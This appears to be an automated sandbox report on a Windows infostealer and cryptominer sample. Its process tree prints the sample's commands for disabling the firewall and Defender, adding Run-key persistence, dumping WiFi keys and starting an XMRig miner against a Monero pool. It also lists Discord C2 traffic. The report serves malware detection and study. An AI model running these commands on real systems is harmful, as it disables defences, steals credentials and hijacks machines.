efb23d8456c6fc70c71b4b0708195f96c0dfdb2b24aad7728e14ab8638dcdd5f

Analysis

max time kernel
33s
max time network
69s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
04/05/2024, 11:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Thisisnotabangerandiknowbangers.exe
Size

80.5MB
MD5

222db82571ceac05e02de2cd2468baa8
SHA1

c28920e640c7a7c68b7999deb93421b0cd72cadd
SHA256

efb23d8456c6fc70c71b4b0708195f96c0dfdb2b24aad7728e14ab8638dcdd5f
SHA512

987721843d4aba75028a115a5c6f2d45c6a0f1b0a220a6e7767ebe3127ca3056e609e9813a5fb4070c4e4cd18bdb3c46b9c8d2e19a9b4999ff5ad2caefb38269
SSDEEP

1572864:KUt0PU1e4iamkhLDyPlfQuZ0znqf3Gd6xdnj+Y/5szPvE7KMZti6vWTUZPj:KUt04e4iadhLDy9fVOznyo6V/MFMvTv3

Score

8^/10

evasion execution persistence spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
344	powershell.exe
512	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Thisisnotabangerandiknowbangers.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3836	netsh.exe

Executes dropped EXE 1 IoCs

pid	Process
696	xmrig.exe

Loads dropped DLL 64 IoCs

pid	Process
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4176-0-0x00007FF6A9260000-0x00007FF6A92CA000-memory.dmp	upx
behavioral1/memory/2856-1284-0x00007FF6A9260000-0x00007FF6A92CA000-memory.dmp	upx
behavioral1/files/0x000700000001adff-1285.dat	upx
behavioral1/memory/2856-1289-0x00007FFBCC960000-0x00007FFBCCDCE000-memory.dmp	upx
behavioral1/files/0x000700000001ad59-1291.dat	upx
behavioral1/files/0x000700000001ada1-1296.dat	upx
behavioral1/memory/2856-1297-0x00007FFBDF370000-0x00007FFBDF394000-memory.dmp	upx
behavioral1/memory/2856-1300-0x00007FFBDF490000-0x00007FFBDF49F000-memory.dmp	upx
behavioral1/files/0x000700000001ad57-1299.dat	upx
behavioral1/files/0x000700000001ad5d-1302.dat	upx
behavioral1/memory/2856-1305-0x00007FFBDF1A0000-0x00007FFBDF1CD000-memory.dmp	upx
behavioral1/memory/2856-1304-0x00007FFBDF350000-0x00007FFBDF369000-memory.dmp	upx
behavioral1/files/0x000700000001ad66-1343.dat	upx
behavioral1/files/0x000700000001ad61-1344.dat	upx
behavioral1/files/0x000700000001ad65-1342.dat	upx
behavioral1/files/0x000700000001ad64-1341.dat	upx
behavioral1/files/0x000700000001ad63-1340.dat	upx
behavioral1/files/0x000700000001ad62-1339.dat	upx
behavioral1/files/0x000700000001ad60-1337.dat	upx
behavioral1/files/0x000700000001ad5f-1336.dat	upx
behavioral1/files/0x000700000001ad5e-1335.dat	upx
behavioral1/files/0x000700000001ad5c-1334.dat	upx
behavioral1/files/0x000700000001ad5b-1333.dat	upx
behavioral1/files/0x000700000001ad5a-1332.dat	upx
behavioral1/files/0x000700000001ad58-1331.dat	upx
behavioral1/files/0x000700000001ad56-1330.dat	upx
behavioral1/files/0x000600000002305d-1329.dat	upx
behavioral1/files/0x0006000000022832-1327.dat	upx
behavioral1/files/0x000700000001e050-1326.dat	upx
behavioral1/files/0x000700000001ae05-1325.dat	upx
behavioral1/files/0x000700000001ae04-1324.dat	upx
behavioral1/files/0x000700000001ae03-1323.dat	upx
behavioral1/files/0x000700000001ad53-1322.dat	upx
behavioral1/files/0x000700000001ad52-1321.dat	upx
behavioral1/files/0x000700000001ad51-1320.dat	upx
behavioral1/files/0x000700000001ad50-1319.dat	upx
behavioral1/files/0x000700000001add4-1318.dat	upx
behavioral1/files/0x000700000001add1-1317.dat	upx
behavioral1/files/0x000700000001adaa-1316.dat	upx
behavioral1/files/0x000700000001ada9-1315.dat	upx
behavioral1/files/0x000700000001ada8-1314.dat	upx
behavioral1/files/0x000700000001ada7-1313.dat	upx
behavioral1/files/0x000700000001ada6-1312.dat	upx
behavioral1/files/0x000700000001ada5-1311.dat	upx
behavioral1/files/0x000700000001ada4-1310.dat	upx
behavioral1/files/0x000700000001ada3-1309.dat	upx
behavioral1/files/0x000700000001ada2-1308.dat	upx
behavioral1/files/0x000700000001ada0-1307.dat	upx
behavioral1/files/0x000700000001ad9d-1306.dat	upx
behavioral1/memory/2856-1347-0x00007FFBDF170000-0x00007FFBDF17D000-memory.dmp	upx
behavioral1/memory/2856-1346-0x00007FFBDF180000-0x00007FFBDF199000-memory.dmp	upx
behavioral1/memory/2856-1349-0x00007FFBDF130000-0x00007FFBDF164000-memory.dmp	upx
behavioral1/memory/2856-1352-0x00007FFBDF120000-0x00007FFBDF12D000-memory.dmp	upx
behavioral1/memory/2856-1353-0x00007FFBDF100000-0x00007FFBDF114000-memory.dmp	upx
behavioral1/memory/2856-1356-0x00007FFBCC5E0000-0x00007FFBCC955000-memory.dmp	upx
behavioral1/memory/4176-1355-0x00007FF6A9260000-0x00007FF6A92CA000-memory.dmp	upx
behavioral1/memory/2856-1359-0x00007FF6A9260000-0x00007FF6A92CA000-memory.dmp	upx
behavioral1/memory/2856-1361-0x00007FFBDBC60000-0x00007FFBDBD18000-memory.dmp	upx
behavioral1/memory/2856-1360-0x00007FFBDF0D0000-0x00007FFBDF0FE000-memory.dmp	upx
behavioral1/memory/2856-1366-0x00007FFBDB3E0000-0x00007FFBDB673000-memory.dmp	upx
behavioral1/memory/2856-1365-0x00007FFBDF0B0000-0x00007FFBDF0C5000-memory.dmp	upx
behavioral1/memory/2856-1364-0x00007FFBCC960000-0x00007FFBCCDCE000-memory.dmp	upx
behavioral1/memory/2856-1369-0x00007FFBDF370000-0x00007FFBDF394000-memory.dmp	upx
behavioral1/memory/2856-1368-0x00007FFBDF0A0000-0x00007FFBDF0B0000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\rose = "C:\\Users\\Admin\\AppData\\Roaming\\rose\\rose.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 27 IoCs

Web Service

T1102

flow	ioc
12	raw.githubusercontent.com
49	discord.com
50	discord.com
20	discord.com
22	discord.com
52	discord.com
33	raw.githubusercontent.com
13	raw.githubusercontent.com
17	discord.com
19	raw.githubusercontent.com
23	discord.com
46	discord.com
14	discord.com
21	raw.githubusercontent.com
53	raw.githubusercontent.com
6	discord.com
15	discord.com
24	raw.githubusercontent.com
36	raw.githubusercontent.com
54	discord.com
4	raw.githubusercontent.com
5	discord.com
37	discord.com
3	raw.githubusercontent.com
25	discord.com
45	discord.com
51	discord.com

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
31	api.ipify.org
32	api.ipify.org
1	api.ipify.org
2	api.ipify.org
9	api.ipify.org
28	ipinfo.io
30	ipinfo.io

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
344	powershell.exe
344	powershell.exe
344	powershell.exe
512	powershell.exe
512	powershell.exe
512	powershell.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe
2856	Thisisnotabangerandiknowbangers.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2856	Thisisnotabangerandiknowbangers.exe
Token: SeIncreaseQuotaPrivilege	4148	wmic.exe
Token: SeSecurityPrivilege	4148	wmic.exe
Token: SeTakeOwnershipPrivilege	4148	wmic.exe
Token: SeLoadDriverPrivilege	4148	wmic.exe
Token: SeSystemProfilePrivilege	4148	wmic.exe
Token: SeSystemtimePrivilege	4148	wmic.exe
Token: SeProfSingleProcessPrivilege	4148	wmic.exe
Token: SeIncBasePriorityPrivilege	4148	wmic.exe
Token: SeCreatePagefilePrivilege	4148	wmic.exe
Token: SeBackupPrivilege	4148	wmic.exe
Token: SeRestorePrivilege	4148	wmic.exe
Token: SeShutdownPrivilege	4148	wmic.exe
Token: SeDebugPrivilege	4148	wmic.exe
Token: SeSystemEnvironmentPrivilege	4148	wmic.exe
Token: SeRemoteShutdownPrivilege	4148	wmic.exe
Token: SeUndockPrivilege	4148	wmic.exe
Token: SeManageVolumePrivilege	4148	wmic.exe
Token: 33	4148	wmic.exe
Token: 34	4148	wmic.exe
Token: 35	4148	wmic.exe
Token: 36	4148	wmic.exe
Token: SeIncreaseQuotaPrivilege	4148	wmic.exe
Token: SeSecurityPrivilege	4148	wmic.exe
Token: SeTakeOwnershipPrivilege	4148	wmic.exe
Token: SeLoadDriverPrivilege	4148	wmic.exe
Token: SeSystemProfilePrivilege	4148	wmic.exe
Token: SeSystemtimePrivilege	4148	wmic.exe
Token: SeProfSingleProcessPrivilege	4148	wmic.exe
Token: SeIncBasePriorityPrivilege	4148	wmic.exe
Token: SeCreatePagefilePrivilege	4148	wmic.exe
Token: SeBackupPrivilege	4148	wmic.exe
Token: SeRestorePrivilege	4148	wmic.exe
Token: SeShutdownPrivilege	4148	wmic.exe
Token: SeDebugPrivilege	4148	wmic.exe
Token: SeSystemEnvironmentPrivilege	4148	wmic.exe
Token: SeRemoteShutdownPrivilege	4148	wmic.exe
Token: SeUndockPrivilege	4148	wmic.exe
Token: SeManageVolumePrivilege	4148	wmic.exe
Token: 33	4148	wmic.exe
Token: 34	4148	wmic.exe
Token: 35	4148	wmic.exe
Token: 36	4148	wmic.exe
Token: SeIncreaseQuotaPrivilege	4400	WMIC.exe
Token: SeSecurityPrivilege	4400	WMIC.exe
Token: SeTakeOwnershipPrivilege	4400	WMIC.exe
Token: SeLoadDriverPrivilege	4400	WMIC.exe
Token: SeSystemProfilePrivilege	4400	WMIC.exe
Token: SeSystemtimePrivilege	4400	WMIC.exe
Token: SeProfSingleProcessPrivilege	4400	WMIC.exe
Token: SeIncBasePriorityPrivilege	4400	WMIC.exe
Token: SeCreatePagefilePrivilege	4400	WMIC.exe
Token: SeBackupPrivilege	4400	WMIC.exe
Token: SeRestorePrivilege	4400	WMIC.exe
Token: SeShutdownPrivilege	4400	WMIC.exe
Token: SeDebugPrivilege	4400	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4400	WMIC.exe
Token: SeRemoteShutdownPrivilege	4400	WMIC.exe
Token: SeUndockPrivilege	4400	WMIC.exe
Token: SeManageVolumePrivilege	4400	WMIC.exe
Token: 33	4400	WMIC.exe
Token: 34	4400	WMIC.exe
Token: 35	4400	WMIC.exe
Token: 36	4400	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
696	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4176 wrote to memory of 2856	4176	Thisisnotabangerandiknowbangers.exe	74
PID 4176 wrote to memory of 2856	4176	Thisisnotabangerandiknowbangers.exe	74
PID 2856 wrote to memory of 68	2856	Thisisnotabangerandiknowbangers.exe	75
PID 2856 wrote to memory of 68	2856	Thisisnotabangerandiknowbangers.exe	75
PID 2856 wrote to memory of 4148	2856	Thisisnotabangerandiknowbangers.exe	77
PID 2856 wrote to memory of 4148	2856	Thisisnotabangerandiknowbangers.exe	77
PID 2856 wrote to memory of 4668	2856	Thisisnotabangerandiknowbangers.exe	80
PID 2856 wrote to memory of 4668	2856	Thisisnotabangerandiknowbangers.exe	80
PID 4668 wrote to memory of 4400	4668	cmd.exe	82
PID 4668 wrote to memory of 4400	4668	cmd.exe	82
PID 2856 wrote to memory of 3400	2856	Thisisnotabangerandiknowbangers.exe	83
PID 2856 wrote to memory of 3400	2856	Thisisnotabangerandiknowbangers.exe	83
PID 2856 wrote to memory of 4448	2856	Thisisnotabangerandiknowbangers.exe	85
PID 2856 wrote to memory of 4448	2856	Thisisnotabangerandiknowbangers.exe	85
PID 4448 wrote to memory of 3760	4448	cmd.exe	87
PID 4448 wrote to memory of 3760	4448	cmd.exe	87
PID 2856 wrote to memory of 3064	2856	Thisisnotabangerandiknowbangers.exe	88
PID 2856 wrote to memory of 3064	2856	Thisisnotabangerandiknowbangers.exe	88
PID 3064 wrote to memory of 428	3064	cmd.exe	90
PID 3064 wrote to memory of 428	3064	cmd.exe	90
PID 2856 wrote to memory of 2344	2856	Thisisnotabangerandiknowbangers.exe	91
PID 2856 wrote to memory of 2344	2856	Thisisnotabangerandiknowbangers.exe	91
PID 2856 wrote to memory of 2444	2856	Thisisnotabangerandiknowbangers.exe	93
PID 2856 wrote to memory of 2444	2856	Thisisnotabangerandiknowbangers.exe	93
PID 2444 wrote to memory of 3836	2444	cmd.exe	95
PID 2444 wrote to memory of 3836	2444	cmd.exe	95
PID 2856 wrote to memory of 2860	2856	Thisisnotabangerandiknowbangers.exe	96
PID 2856 wrote to memory of 2860	2856	Thisisnotabangerandiknowbangers.exe	96
PID 2856 wrote to memory of 4948	2856	Thisisnotabangerandiknowbangers.exe	98
PID 2856 wrote to memory of 4948	2856	Thisisnotabangerandiknowbangers.exe	98
PID 4948 wrote to memory of 344	4948	cmd.exe	100
PID 4948 wrote to memory of 344	4948	cmd.exe	100
PID 2856 wrote to memory of 2244	2856	Thisisnotabangerandiknowbangers.exe	102
PID 2856 wrote to memory of 2244	2856	Thisisnotabangerandiknowbangers.exe	102
PID 2244 wrote to memory of 512	2244	cmd.exe	104
PID 2244 wrote to memory of 512	2244	cmd.exe	104
PID 2856 wrote to memory of 424	2856	Thisisnotabangerandiknowbangers.exe	105
PID 2856 wrote to memory of 424	2856	Thisisnotabangerandiknowbangers.exe	105
PID 424 wrote to memory of 4700	424	cmd.exe	107
PID 424 wrote to memory of 4700	424	cmd.exe	107
PID 2856 wrote to memory of 2824	2856	Thisisnotabangerandiknowbangers.exe	108
PID 2856 wrote to memory of 2824	2856	Thisisnotabangerandiknowbangers.exe	108
PID 2824 wrote to memory of 4256	2824	cmd.exe	110
PID 2824 wrote to memory of 4256	2824	cmd.exe	110
PID 2856 wrote to memory of 4400	2856	Thisisnotabangerandiknowbangers.exe	111
PID 2856 wrote to memory of 4400	2856	Thisisnotabangerandiknowbangers.exe	111
PID 4400 wrote to memory of 4924	4400	cmd.exe	113
PID 4400 wrote to memory of 4924	4400	cmd.exe	113
PID 2856 wrote to memory of 2076	2856	Thisisnotabangerandiknowbangers.exe	114
PID 2856 wrote to memory of 2076	2856	Thisisnotabangerandiknowbangers.exe	114
PID 2076 wrote to memory of 1324	2076	cmd.exe	116
PID 2076 wrote to memory of 1324	2076	cmd.exe	116
PID 2856 wrote to memory of 1948	2856	Thisisnotabangerandiknowbangers.exe	117
PID 2856 wrote to memory of 1948	2856	Thisisnotabangerandiknowbangers.exe	117
PID 1948 wrote to memory of 4128	1948	cmd.exe	119
PID 1948 wrote to memory of 4128	1948	cmd.exe	119
PID 2856 wrote to memory of 4584	2856	Thisisnotabangerandiknowbangers.exe	120
PID 2856 wrote to memory of 4584	2856	Thisisnotabangerandiknowbangers.exe	120
PID 2856 wrote to memory of 1836	2856	Thisisnotabangerandiknowbangers.exe	122
PID 2856 wrote to memory of 1836	2856	Thisisnotabangerandiknowbangers.exe	122
PID 1836 wrote to memory of 3496	1836	cmd.exe	124
PID 1836 wrote to memory of 3496	1836	cmd.exe	124
PID 2856 wrote to memory of 2768	2856	Thisisnotabangerandiknowbangers.exe	125
PID 2856 wrote to memory of 2768	2856	Thisisnotabangerandiknowbangers.exe	125

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4256	attrib.exe
4924	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Thisisnotabangerandiknowbangers.exe
"C:\Users\Admin\AppData\Local\Temp\Thisisnotabangerandiknowbangers.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4176
- C:\Users\Admin\AppData\Local\Temp\Thisisnotabangerandiknowbangers.exe
  "C:\Users\Admin\AppData\Local\Temp\Thisisnotabangerandiknowbangers.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ver"
    3⤵
    PID:68
- - C:\Windows\System32\Wbem\wmic.exe
    wmic csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get MUILanguages /format:list"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get MUILanguages /format:list
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4400
- - C:\Windows\System32\Wbem\wmic.exe
    wmic os get MUILanguages /format:list
    3⤵
    PID:3400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption /format:list"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4448
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption /format:list
      4⤵
      PID:3760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3064
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path softwarelicensingservice get OA3xOriginalProductKey
      4⤵
      PID:428
- - C:\Windows\System32\Wbem\wmic.exe
    wmic csproduct get name
    3⤵
    PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh advfirewall set domainprofile state off"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2444
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set domainprofile state off
      4⤵
      Modifies Windows Firewall
      PID:3836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableRealtimeMonitoring" -Value 1"
    3⤵
    PID:2860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\rose','C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\rose','C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:424
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2824
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4400
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v rose /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2076
  - - C:\Windows\system32\reg.exe
      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v rose /f
      4⤵
      PID:1324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v rose /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\rose\rose.exe" /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1948
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v rose /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\rose\rose.exe" /f
      4⤵
      Adds Run key to start application
      PID:4128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ver"
    3⤵
    PID:4584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1836
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      PID:3496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile name="The Wireless AutoConfig Service (wlansvc) is not running." key=clear"
    3⤵
    PID:2768
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile name="The Wireless AutoConfig Service (wlansvc) is not running." key=clear
      4⤵
      PID:4796
- - C:\Users\Admin\AppData\Roaming\rose\xmrig\xmrig-6.21.0\xmrig.exe
    C:\Users\Admin\AppData\Roaming\rose\xmrig\xmrig-6.21.0\xmrig.exe --donate-level 1 -o de.monero.herominers.com:1111 -u 496CTrUBWUHKJ2euu85JUp8hRS3aRQSreBiYFjg9T88rVyc1s37Hne4ZwHMYHZuejULJLEcb48cA6cyP7qeFyQyAHPC3hvR -p 110349668029 -a rx/0 -k --background
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    PID:696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI41762\SDL2.dll

Filesize
635KB

MD5
aacc454789a522c8652717096b3b6cc4

SHA1
b08c9349abe6d8d15679cc5f77b51eeb25bcfcd8

SHA256
61f927f4ab813fccebc600ffb0870f6ebdff856914d8fc208eb86b01d6be4859

SHA512
9e04b0695c25c78e243bc1e93c0880c6d522179369b05b31843efa9b22468ecde392a898b7eaeac2ffc2c0525df07b3e2f4ca0cb0fe7d73af27a5def4f6b5f8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41762\SDL2_image.dll

Filesize
58KB

MD5
71780d5b9aedb54b990b975aff28bbf3

SHA1
dd59dfd88255e26e9f6fc2c96972f37f175189c1

SHA256
f670f630df5dbdf0a6e19f7bbb5cb280db519a72ddef8567a1e9315591604e96

SHA512
959edf08748a00e0c2f84c352119def05b4c4da884a178cae47b6e776eefbc87534f084b5a279c4a778a99f84ea7b98c71fb259a54ca9a12ffa506c5824f48e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41762\SDL2_mixer.dll

Filesize
124KB

MD5
4bf8a0231b35b804cdd002ca6ec234eb

SHA1
f6e2192e02ce714612c6aaa3fe85e3c9adb6447b

SHA256
867ea749aa6b8432c69c43b9606d8e6de19e88aef3aea2faf1b0643e0c6c516f

SHA512
420c45ff39491814e56fc6b4bf4eb99bb2b31eb4d8ead4d25fd84ef00b8b17973eb3a7bf7b31a0c100b813b717fcefe4245c403ec36038158c87bf24faf46623

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41762\SDL2_ttf.dll

Filesize
601KB

MD5
e3913036bdb469d933c658737dd05464

SHA1
30fd6b3571472d50d4a87b4908daef1c5516afd5

SHA256
e85aa1b2a8d7624973f9f0db7ff502e615b57edf38b0af7b030ee9cb01561416

SHA512
df6837512de2e3d03a4ce00ad20f72100139e15c80ae7062d12e4b266e4b6670b30889778621ecc869fcca691a03263158f2fa57a6bcaac9b3bda952bf88b749

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41762\VCRUNTIME140_1.dll

Filesize
48KB

MD5
bba9680bc310d8d25e97b12463196c92

SHA1
9a480c0cf9d377a4caedd4ea60e90fa79001f03a

SHA256
e0b66601cc28ecb171c3d4b7ac690c667f47da6b6183bff80604c84c00d265ab

SHA512
